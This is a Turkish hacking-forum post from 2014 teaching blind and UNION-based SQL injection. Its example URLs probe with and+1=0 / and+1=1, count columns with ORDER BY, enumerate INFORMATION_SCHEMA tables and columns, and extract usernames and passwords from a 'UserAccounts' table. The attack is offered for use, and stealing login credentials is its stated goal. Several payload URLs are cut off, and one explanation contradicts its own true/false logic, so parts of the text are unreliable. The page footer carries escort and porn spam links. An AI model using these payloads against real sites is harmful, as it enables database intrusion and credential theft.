KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Blind İnjection Anlatımı
Konu : Blind İnjection Anlatımı - 27.10.2014, 20:50
Mesaj: #1
Anlatım Bana Aittir Kendinize İyi Bakın Sql Çeşitlerini Burda Bitirmiş Bulunmaktayım Kendinize İyi Bakın.. Neyse Başlayalım

Blind de Hata Sayfanın and+1=1 , and+1=0
Arkadaşlar Biraz Karışık Olabilir Elimden Geldiği Kadar Sizlere
Laf Kalabalığı Yapmadan Anlatacağım Direk Başlıyalım...

Örnek :

http://www.blackshadow.com/page.php?id=10+and+1=0


http://www.blackshadow.com/page.php?id=10+and+1=1

Bu Şekilde İse Ekran Görüntülenecektir.Çünkü 1,1 e Eşittir. Mantıken

Bundan Sonrasını Normal İnj Olarak Uygulayacağız. Makaleme Bakabilirsiniz.

http://www.blackshadow.com/page.php?.....database()--

Burada and+1=0 yapmış bulunmaktayız.1 0 ’a eşit olmadığı için (false) olumsuz cevap verecektir.

http://www.blackshadow.com/page.php?.....database()--

Burada and+1=1 yaptık.1 1 ’e eşit olduğu için (true) olumlu cevap verecektir ve Tablolar Yansıyacaktır.

.


Şimdi Geldik Komutlara

http://www.site.com/news.asp?ArticleID=10+AND+1=0- Komutun Çevirisi; Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster. Bu durumda, “AND” komutu makalenin görüntülenmek için uygun olduğu anlamına gelir, makale 10 bulunmalı ve 1’de 0’a eşit olmalı. Bu da makalenin yüklenmemesine neden olur çünkü 1, 0’a benzer degildir.

http://www.site.com/news.asp?ArticleID=10+AND+1=1-

Komutun Çevirisi; Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster. Makale görüntülenebilmeli, çünkü 10 numaralı makale mevcut ve 1’de 0’a eşit. İstediğinizde makale yüklendiğinden ve istemediğinizde de yüklenmediğinden dolayı komutlarımızın buradan komutların çalışıyor olduğunu anlayabiliriz. Bu da linkin açık olduğu ve devam edebileceğimiz anlamına gelir.

--- Sayfada Gösterilen Toplam Sütun Sayısını Bulmak ---

http://www.site.com/news.asp?ArticleID=10+ORDER+BY+1- “ORDER BY 1” Sırala Demektir Arkadaşalar Zaten Order Sırala Demektir Neyse Devam Edelim.

(1 Numaralı Stünun Bulundugu Mekan) sayfaya 1 numaralı sütunu ilk sayfa içerisinde göstermesini söyler. “ORDER BY 2” 2 numaralı sütunu ilk sayfada gösterir. Komutun Anlamı: “SELECT” Hocam Burda Sizlere Şöyle Diyim Sizin Belirtdiğin Tabloda ki bilgileri ister ben sana öyle anlatayım

Hedef Tabloda İsim Bulmak

http://www.site.com/news.asp?ArticleID=-...ayed_table’-

Not : Aradığımız Tablo Username ve Passwordların Bulunduğu Table’dır. Tablolara Ulaştıktan Sonra, Doğru Tabloyu Bulabilmek İçin “TABLES” kısmının sonuna -+WHERE+table_name>’displayed_table’ - Ekle Kardeşim. Komutun Anlamı: Listedeki ‘displayed_table’ den sonraki tablonun ismini görüntüle.

--- Column’ları ( Kolon ) Görüntülemek ---

http://www.blackshadow1.com/news.asp?ArticleID= 1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SC HEMA.COLUMNS+WHERE+table_name=&**8203;’UserAccount s’—

Komutun Anlamı: “UserAccounts” tablosundaki sütunların isimlerini görüntüle. Bu Komutumuz İle “UserAccounts” Table’ında Bulunan Columnları ( Kolon ) Göreceksiniz.

--- Hedef Columnları Bulalım ---

http://www.blackshadow1.com/news.asp.....yed_column’-

Eğer kullanıcı adı ve şifreleri arıyorsanız; username, password, user,pass, login_name gibi isimlerle adlandırılmış sütunları bulmayı denemelisiniz. Komutun Anlamı: Listedeki ’displayed_column.’ Dan sonraki diğer sütunun ismini görüntüle.

--- Database’deki User’ın Bilgilerini Çekelim ---

Table Name: “UserAccounts” Column Name: “username” ve “password” http://www.blackshadow1.com/news.asp.....erAccounts--

Komutun Anlamı: “UserAccounts” tablosundaki “username” sütununda bulunan kayıtları görüntüle. Username’imiz "black" Olsun.

http://www.blackshadow1.com/news.asp...L...unts+WHERE +username=’black’--
]

Burda ki Komutun Amacı : UserAccounts(Kullanıcı Üyeliğindeki) Tablosunda’ki “black” Nickli Kullanıcının Şifresini Göster
Password : System black Nicli User’ın Password’unun Sistem Oldugunu Düşünelim

Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
 

Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort türk ifşa hd porno